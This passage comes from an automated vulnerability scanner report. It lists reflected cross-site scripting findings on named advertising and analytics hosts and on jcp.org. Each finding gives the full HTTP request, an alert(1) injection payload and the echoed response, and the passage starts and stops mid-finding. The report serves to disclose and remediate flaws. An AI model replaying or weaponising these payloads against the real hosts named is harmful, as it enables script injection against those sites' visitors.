Cookie: icu=ChIIrIsBEAoYASABKAEwwfGD8wQQwfGD8wQYAA..; anj=Kfu=8fG5EfE:3F.0s]#%2L_'x%SEV/i#-?R!z6Ut0QkM9e5'Qr*vP.V*lpYBPp[Bs3dBED7@8!MMT@<SGb]bp@OWFe]M3^!WeuSpp!<tk0xzCgSDb'W7Qc:sp!-ewEI]-`k1+Uxk1GOGkI/$_.v=_!`4hTmV3oY`#EoW=LnXT`HX)Ny^rF?u'>@*e?CDQ!(G@]1BW0Q<EQU#3!ZR*?l7/tm%40RO-2NpM_ZlEy!<e/e+ztxA; sess=1; uuid2=-1

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Set-Cookie: sess=1; path=/; expires=Sun, 18-Sep-2011 00:54:35 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=-17; path=/; expires=Fri, 16-Dec-2011 00:54:35 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb549359=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb201818=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=ChII2IgDEAoYUSBRKFEwzN_P8wQQzN_P8wQYUA..; path=/; expires=Fri, 16-Dec-2011 00:54:36 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb884=![nC'208WMcbJO=)IE.8$p5s4?enc=AAAAAAAA0D8zMzMzMzPLPwAAAAAAABRAMzMzMzMzyz8AAAAAAADQP8hj40ddzOJZ7__________L73NOAAAAAP7HBwACAgAAHgAAAAMAAACpIQUAiwMBAAEAAABVU0QAVVNEACwB-gAKJwAAzxEBAgUCAQUAAAAAdx2drAAAAAA.&tt_code=2298003&click=http://g.ca.bid.invitemedia.com/pixel%3FreturnType=redirect%26key=Click%26message=eJwtjDEOwDAIA78SMXcADI7SN0XdOlX9e0HqdD7Z8Agg5zBNRB5D4GU0WrLMSoQxuYhlae5QrAjpZXczXWdbn3kxf0bxuveuyP5PV8P7AXsaFSU-%26redirectURL=&pixel=http://g.ca.bid.invitemedia.com/adnxs_imp%3FreturnType=image%26key=AdImp%26cost=$%7BPRICE_PAID%7D%26ex_uid=2_-17%26creativeID=112554%26message=eJwtjDEOwDAIA78SMXcADI7SN0XdOlX9e0HqdD7Z8Agg5zBNRB5D4GU0WrLMSoQxuYhlae5QrAjpZXczXWdbn3kxf0bxuveuyP5PV8P7AXsaFSU-%26managed=false&media_subtypes=1; path=/; expires=Sun, 18-Sep-2011 00:54:36 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG4S]fQCe7?0P(*AuB-u**g1:XIF3Z#yJ16m@n8l)=m!zsC8%0Q!816usE!>w6Lc1t!<6-c4nLmV#(f3[iRHV@?K@i[?NGU:QTKx<k4Ji.4N$kk1OJY^A'Bdr9u)1l85nIwbM6sex^qF_k7^/suduT>zr!%>zw81Y'8Y7?BMSJYDNCC'Y#an; path=/; expires=Fri, 16-Dec-2011 00:54:36 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Sat, 17 Sep 2011 00:54:36 GMT
Content-Length: 246

document.write('<scr'+'ipt type="text/javascript"src="http://ad.yieldmanager.com/imp?anmember=514&anprice=20&Z=300x250&s=2298003&r=1&_salt=1775927586&u=http%3A%2F%2Fwww.tmz.com%2F&u=http://www.tmz.com/a19be';alert(1)//63b277fa96a">
...[SNIP]...

4.116. http://ibmwebsphere.tt.omtrdc.net/m2/ibmwebsphere/mbox/standard [mbox parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ibmwebsphere.tt.omtrdc.net
Path:   /m2/ibmwebsphere/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 36dcc<script>alert(1)</script>39a607c6ef6 was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/ibmwebsphere/mbox/standard?mboxHost=www-142.ibm.com&mboxSession=1316221012167-554408&mboxPage=1316221012167-554408&screenHeight=1200&screenWidth=1920&browserWidth=1106&browserHeight=789&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&mboxCount=2&mbox=eps_bykeyword_search36dcc<script>alert(1)</script>39a607c6ef6&mboxId=0&mboxTime=1316203014547&mboxURL=http%3A%2F%2Fwww-142.ibm.com%2Fsoftware%2Fproducts%2Fus%2Fen%2Fsearch%3Fpgel%3Dlnav%26hppcode%3D1%26st%3Dnew%26q1%3Dxss&mboxReferrer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&mboxVersion=40 HTTP/1.1
Host: ibmwebsphere.tt.omtrdc.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www-142.ibm.com/software/products/us/en/search?pgel=lnav&hppcode=1&st=new&q1=xss
Cookie: mboxSession=1316221012167-554408; mboxPC=1316221012167-554408.19

Response

HTTP/1.1 200 OK
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1316221012167-554408.19; Domain=ibmwebsphere.tt.omtrdc.net; Expires=Fri, 30-Sep-2011 19:56:52 GMT; Path=/m2/ibmwebsphere
Content-Type: text/javascript
Content-Length: 216
Date: Fri, 16 Sep 2011 19:56:52 GMT
Server: Test & Target

mboxFactories.get('default').get('eps_bykeyword_search36dcc<script>alert(1)</script>39a607c6ef6',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1316221012167-554408.19");

4.117. http://imp.fetchback.com/serve/fb/adtag.js [clicktracking parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/adtag.js

Issue detail

The value of the clicktracking request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c993b"-alert(1)-"79e3f04e7ed was submitted in the clicktracking parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /serve/fb/adtag.js?tid=68326&type=mrect&clicktracking=http%3A%2F%2Fad%2Eyieldmanager%2Ecom%2Fclk%3F3%2CeAGljc0OgjAQhF%2DIgNsiFBsP1UYDUpWkROFmyp9RgkaSKk%2DvAvEFnMs3m83MAKbgoQJIcSIKO%2DA6UwoYuXaWuyQjxoRSijF4DnKREa0bxgIR%2DZp3ZqpZrw3fB%2DVgWU9%2EOPbky%2EWK36vt%2DDbJ4zXaP8GBV2Ls%2DOyN%2D%2EpY5Bn3F79yHkEiVbfj5Ss8xDrpVCvk6iqWcN7K9BJKZacyuwiZPNM6RrtfkM0No2rb28yytNZmW3emamrrDQ6KVYI%3D%2Cc993b"-alert(1)-"79e3f04e7ed HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: opt=1

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:52:29 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: uid=1_1316220749_1316220738792:7409124710126868; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Sat, 17 Sep 2011 00:52:29 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 575

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=68326&type=mrect&clicktracking=http%3A%2F%2Fad%2Eyieldmanager%2Ecom%2Fclk%3F3%2CeAGljc0OgjAQhF%2DIgNsiFBsP1UYDUpWkROFmyp9RgkaS
...[SNIP]...
2DA6UwoYuXaWuyQjxoRSijF4DnKREa0bxgIR%2DZp3ZqpZrw3fB%2DVgWU9%2EOPbky%2EWK36vt%2DDbJ4zXaP8GBV2Ls%2DOyN%2D%2EpY5Bn3F79yHkEiVbfj5Ss8xDrpVCvk6iqWcN7K9BJKZacyuwiZPNM6RrtfkM0No2rb28yytNZmW3emamrrDQ6KVYI%3D%2Cc993b"-alert(1)-"79e3f04e7ed' width='300' height='250' marginheight='0' marginwidth='0' frameborder='0' scrolling='no'"+">
...[SNIP]...

4.118. http://imp.fetchback.com/serve/fb/adtag.js [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/adtag.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5581f"-alert(1)-"11bcd5d0490 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /serve/fb/adtag.js?tid=68326&type=mrect&clicktracking=http%3A%2F%2Fad%2Eyieldmanager%2Ecom%2Fclk%3F3%2CeAGljc0OgjAQhF%2DIgNsiFBsP1UYDUpWkROFmyp9RgkaSKk%2DvAvEFnMs3m83MAKbgoQJIcSIKO%2DA6UwoYuXaWuyQjxoRSijF4DnKREa0bxgIR%2DZp3ZqpZrw3fB%2DVgWU9%2EOPbky%2EWK36vt%2DDbJ4zXaP8GBV2Ls%2DOyN%2D%2EpY5Bn3F79yHkEiVbfj5Ss8xDrpVCvk6iqWcN7K9BJKZacyuwiZPNM6RrtfkM0No2rb28yytNZmW3emamrrDQ6KVYI%3D%2C&5581f"-alert(1)-"11bcd5d0490=1 HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: opt=1

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:52:31 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: uid=1_1316220751_1316220738792:7409124710126868; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Sat, 17 Sep 2011 00:52:31 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 578

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=68326&type=mrect&clicktracking=http%3A%2F%2Fad%2Eyieldmanager%2Ecom%2Fclk%3F3%2CeAGljc0OgjAQhF%2DIgNsiFBsP1UYDUpWkROFmyp9RgkaS
...[SNIP]...
DA6UwoYuXaWuyQjxoRSijF4DnKREa0bxgIR%2DZp3ZqpZrw3fB%2DVgWU9%2EOPbky%2EWK36vt%2DDbJ4zXaP8GBV2Ls%2DOyN%2D%2EpY5Bn3F79yHkEiVbfj5Ss8xDrpVCvk6iqWcN7K9BJKZacyuwiZPNM6RrtfkM0No2rb28yytNZmW3emamrrDQ6KVYI%3D%2C&5581f"-alert(1)-"11bcd5d0490=1' width='300' height='250' marginheight='0' marginwidth='0' frameborder='0' scrolling='no'"+">
...[SNIP]...

4.119. http://imp.fetchback.com/serve/fb/adtag.js [type parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/adtag.js

Issue detail

The value of the type request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 95638"-alert(1)-"4bc29a81874 was submitted in the type parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /serve/fb/adtag.js?tid=68326&type=mrect95638"-alert(1)-"4bc29a81874&clicktracking=http%3A%2F%2Fad%2Eyieldmanager%2Ecom%2Fclk%3F3%2CeAGljc0OgjAQhF%2DIgNsiFBsP1UYDUpWkROFmyp9RgkaSKk%2DvAvEFnMs3m83MAKbgoQJIcSIKO%2DA6UwoYuXaWuyQjxoRSijF4DnKREa0bxgIR%2DZp3ZqpZrw3fB%2DVgWU9%2EOPbky%2EWK36vt%2DDbJ4zXaP8GBV2Ls%2DOyN%2D%2EpY5Bn3F79yHkEiVbfj5Ss8xDrpVCvk6iqWcN7K9BJKZacyuwiZPNM6RrtfkM0No2rb28yytNZmW3emamrrDQ6KVYI%3D%2C HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: opt=1

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:52:27 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1316220747_1316220738792:7409124710126868; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Sat, 17 Sep 2011 00:52:27 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 575

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=68326&type=mrect95638"-alert(1)-"4bc29a81874&clicktracking=http%3A%2F%2Fad%2Eyieldmanager%2Ecom%2Fclk%3F3%2CeAGljc0OgjAQhF%2DIgNsiFBsP1UYDUpWkROFmyp9RgkaSKk%2DvAvEFnMs3m83MAKbgoQJIcSIKO%2DA6UwoYuXaWuyQjxoRSijF4DnKREa0bxgIR%2DZp3ZqpZrw3fB%2DVgWU9
...[SNIP]...

4.120. http://jcp.org/en/jsr/all [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jcp.org
Path:   /en/jsr/all

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 284c1"><script>alert(1)</script>451b1e39851 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/jsr/all?284c1"><script>alert(1)</script>451b1e39851=1 HTTP/1.1
Host: jcp.org
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://jcp.org/aboutJava/communityprocess/maintenance/jsr234/index2.html

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Fri, 16 Sep 2011 19:57:07 GMT
Content-type: text/html;charset=ISO-8859-1
Content-Length: 411049


<!-- ** BEGIN: header.jsp ** //-->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3c.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head>



...[SNIP]...
<input name="uri" value="/en/jsr/all?284c1"><script>alert(1)</script>451b1e39851=1" type="hidden">
...[SNIP]...

4.121. http://js.revsci.net/gateway/gw.js [ali parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the ali request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ea4cb'%3balert(1)//4b86e2820c was submitted in the ali parameter. This input was echoed as ea4cb';alert(1)//4b86e2820c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /gateway/gw.js?auto=t&csid=A10868&ver=2.2&clen=328&vid=27200&pid=261950&pli=3449146&sid=2298003&ali=3329023ea4cb'%3balert(1)//4b86e2820c&cid=10288627&p=99&ref=http%3A//www.tmz.com/& HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=optout

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sat, 17 Sep 2011 00:52:48 GMT
Cache-Control: max-age=86400, private
Expires: Sun, 18 Sep 2011 00:52:48 GMT
X-Proc-ms: 2
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 00:52:48 GMT
Content-Length: 5217

//AG-develop 12.7.1-110 (2011-08-15 17:17:21 UTC)
var rsi_now= new Date();
var rsi_csid= 'A10868';if(typeof(csids)=="undefined"){var csids=[rsi_csid];}else{csids.push(rsi_csid);};function rsiClient(Da
...[SNIP]...
);
A10868.DM_addEncToLoc('vid', '27200');
A10868.DM_addEncToLoc('pid', '261950');
A10868.DM_addEncToLoc('pli', '3449146');
A10868.DM_addEncToLoc('sid', '2298003');
A10868.DM_addEncToLoc('ali', '3329023ea4cb';alert(1)//4b86e2820c');
A10868.DM_addEncToLoc('cid', '10288627');
A10868.DM_addEncToLoc('p', '99');
A10868.DM_addEncToLoc('ref', 'http://www.tmz.com/');
if(window[rsi_csid])window[rsi_csid].DM_tag();else DM_tag();

4.122. http://js.revsci.net/gateway/gw.js [cid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the cid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fe30b'%3balert(1)//803e9c23130 was submitted in the cid parameter. This input was echoed as fe30b';alert(1)//803e9c23130 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /gateway/gw.js?auto=t&csid=A10868&ver=2.2&clen=328&vid=27200&pid=261950&pli=3449146&sid=2298003&ali=3329023&cid=10288627fe30b'%3balert(1)//803e9c23130&p=99&ref=http%3A//www.tmz.com/& HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=optout

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sat, 17 Sep 2011 00:52:48 GMT
Cache-Control: max-age=86400, private
Expires: Sun, 18 Sep 2011 00:52:48 GMT
X-Proc-ms: 1
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 00:52:48 GMT
Content-Length: 5218

//AG-develop 12.7.1-110 (2011-08-15 17:17:21 UTC)
var rsi_now= new Date();
var rsi_csid= 'A10868';if(typeof(csids)=="undefined"){var csids=[rsi_csid];}else{csids.push(rsi_csid);};function rsiClient(Da
...[SNIP]...
A10868.DM_addEncToLoc('pid', '261950');
A10868.DM_addEncToLoc('pli', '3449146');
A10868.DM_addEncToLoc('sid', '2298003');
A10868.DM_addEncToLoc('ali', '3329023');
A10868.DM_addEncToLoc('cid', '10288627fe30b';alert(1)//803e9c23130');
A10868.DM_addEncToLoc('p', '99');
A10868.DM_addEncToLoc('ref', 'http://www.tmz.com/');
if(window[rsi_csid])window[rsi_csid].DM_tag();else DM_tag();

4.123. http://js.revsci.net/gateway/gw.js [clen parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the clen request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 31fab'%3balert(1)//0fad37552c8 was submitted in the clen parameter. This input was echoed as 31fab';alert(1)//0fad37552c8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /gateway/gw.js?auto=t&csid=A10868&ver=2.2&clen=32831fab'%3balert(1)//0fad37552c8&vid=27200&pid=261950&pli=3449146&sid=2298003&ali=3329023&cid=10288627&p=99&ref=http%3A//www.tmz.com/& HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=optout

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sat, 17 Sep 2011 00:52:35 GMT
Cache-Control: max-age=86400, private
Expires: Sun, 18 Sep 2011 00:52:35 GMT
X-Proc-ms: 1
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 00:52:34 GMT
Content-Length: 5218

//AG-develop 12.7.1-110 (2011-08-15 17:17:21 UTC)
var rsi_now= new Date();
var rsi_csid= 'A10868';if(typeof(csids)=="undefined"){var csids=[rsi_csid];}else{csids.push(rsi_csid);};function rsiClient(Da
...[SNIP]...
csid);
if(window[rsi_csid])window[rsi_csid].rsi_ral(1);else rsi_ral(1);
if(window[rsi_csid])window[rsi_csid].rsi_r();else rsi_r();
A10868.DM_addEncToLoc('ver', '2.2');
A10868.DM_addEncToLoc('clen','32831fab';alert(1)//0fad37552c8');
A10868.DM_addEncToLoc('vid', '27200');
A10868.DM_addEncToLoc('pid', '261950');
A10868.DM_addEncToLoc('pli', '3449146');
A10868.DM_addEncToLoc('sid', '2298003');
A10868.DM_addEncToLoc('ali', '332902
...[SNIP]...

4.124. http://js.revsci.net/gateway/gw.js [csid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload 7ec98<script>alert(1)</script>b1efe77bc87 was submitted in the csid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gateway/gw.js?auto=t&csid=A108687ec98<script>alert(1)</script>b1efe77bc87&ver=2.2&clen=328&vid=27200&pid=261950&pli=3449146&sid=2298003&ali=3329023&cid=10288627&p=99&ref=http%3A//www.tmz.com/& HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=optout

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sat, 17 Sep 2011 00:52:29 GMT
Cache-Control: max-age=86400, private
Expires: Sun, 18 Sep 2011 00:52:29 GMT
X-Proc-ms: 1
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 00:52:29 GMT
Content-Length: 128

/*
* JavaScript include error:
* The customer code "A108687EC98<SCRIPT>ALERT(1)</SCRIPT>B1EFE77BC87" was not recognized.
*/

4.125. http://js.revsci.net/gateway/gw.js [p parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the p request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 91982'%3balert(1)//e1948788f29 was submitted in the p parameter. This input was echoed as 91982';alert(1)//e1948788f29 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /gateway/gw.js?auto=t&csid=A10868&ver=2.2&clen=328&vid=27200&pid=261950&pli=3449146&sid=2298003&ali=3329023&cid=10288627&p=9991982'%3balert(1)//e1948788f29&ref=http%3A//www.tmz.com/& HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=optout

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sat, 17 Sep 2011 00:52:50 GMT
Cache-Control: max-age=86400, private
Expires: Sun, 18 Sep 2011 00:52:50 GMT
X-Proc-ms: 1
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 00:52:50 GMT
Content-Length: 5218

//AG-develop 12.7.1-110 (2011-08-15 17:17:21 UTC)
var rsi_now= new Date();
var rsi_csid= 'A10868';if(typeof(csids)=="undefined"){var csids=[rsi_csid];}else{csids.push(rsi_csid);};function rsiClient(Da
...[SNIP]...
');
A10868.DM_addEncToLoc('pli', '3449146');
A10868.DM_addEncToLoc('sid', '2298003');
A10868.DM_addEncToLoc('ali', '3329023');
A10868.DM_addEncToLoc('cid', '10288627');
A10868.DM_addEncToLoc('p', '9991982';alert(1)//e1948788f29');
A10868.DM_addEncToLoc('ref', 'http://www.tmz.com/');
if(window[rsi_csid])window[rsi_csid].DM_tag();else DM_tag();

4.126. http://js.revsci.net/gateway/gw.js [pid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the pid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5b443'%3balert(1)//a35e45272ee was submitted in the pid parameter. This input was echoed as 5b443';alert(1)//a35e45272ee in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /gateway/gw.js?auto=t&csid=A10868&ver=2.2&clen=328&vid=27200&pid=2619505b443'%3balert(1)//a35e45272ee&pli=3449146&sid=2298003&ali=3329023&cid=10288627&p=99&ref=http%3A//www.tmz.com/& HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=optout

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
